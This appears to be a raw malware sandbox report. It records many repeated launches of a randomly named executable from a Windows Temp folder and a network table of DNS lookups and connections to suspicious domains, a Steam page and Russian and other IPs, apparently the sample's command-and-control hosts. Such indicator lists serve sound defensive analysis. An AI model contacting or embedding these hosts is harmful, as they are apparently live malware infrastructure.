C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10038830101\Dyshh8M.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
US 8.8.8.8:53 calmingtefxtures.run udp
US 172.67.158.171:443 calmingtefxtures.run tcp
US 8.8.8.8:53 foresctwhispers.top udp
US 104.21.32.1:443 foresctwhispers.top tcp
RU 176.113.115.6:80 176.113.115.6 tcp
US 8.8.8.8:53 tracnquilforest.life udp
US 104.21.74.230:443 tracnquilforest.life tcp
RU 176.113.115.7:80 176.113.115.7 tcp
GB 2.18.66.73:443 www.bing.com tcp
US 8.8.8.8:53 pirtyoffensiz.bet udp
US 8.8.8.8:53 uncertainyelemz.bet udp
US 8.8.8.8:53 hobbyedsmoker.live udp
US 8.8.8.8:53 dsfljsdfjewf.info udp
US 8.8.8.8:53 deaddereaste.today udp
US 8.8.8.8:53 subawhipnator.life udp
US 8.8.8.8:53 privileggoe.live udp
US 8.8.8.8:53 decreaserid.world udp
US 8.8.8.8:53 pastedeputten.life udp
US 8.8.8.8:53 steamcommunity.com udp
FR 2.18.131.137:443 steamcommunity.com tcp
US 8.8.8.8:53 disobilittyhell.live udp
US 172.67.137.158:443 disobilittyhell.live tcp
US 172.67.137.158:443 disobilittyhell.live tcp
US 172.67.137.158:443 disobilittyhell.live tcp
US 8.8.8.8:53 presentymusse.world udp
US 8.8.8.8:53 deaddereaste.today udp
US 8.8.8.8:53 subawhipnator.life udp
US 8.8.8.8:53 privileggoe.live udp
US 8.8.8.8:53 boltetuurked.digital udp
US 8.8.8.8:53 pastedeputten.life udp
FR 2.18.131.137:443 steamcommunity.com tcp
US 172.67.137.158:443 disobilittyhell.live tcp
US 172.67.137.158:443 disobilittyhell.live tcp
US 8.8.8.8:53 cobolrationumelawrtewarms.com udp
NL 107.189.27.66:80 cobolrationumelawrtewarms.com tcp
DE 104.194.157.122:80 104.194.157.122 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 172.67.137.158:443 disobilittyhell.live tcp
RU 185.215.113.115:80 185.215.113.115 tcp
US 8.8.8.8:53 clients2.google.com udp
NL 142.251.36.46:443 clients2.google.com tcp
US 8.8.8.8:53 www.google.com udp
NL 172.217.168.196:443 www.google.com tcp
NL 172.217.168.196:443 www.google.com udp
US 8.8.8.8:53 clients2.googleusercontent.com udp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
US 8.8.8.8:53 apis.google.com udp
NL 142.251.36.10:443 ogads-pa.googleapis.com udp
NL 172.217.168.206:443 apis.google.com udp
NL 142.251.36.10:443 ogads-pa.googleapis.com tcp
NL 142.250.179.129:443 clients2.googleusercontent.com udp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
NL 142.251.36.14:443 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
N/A 224.0.0.251:5353 udp
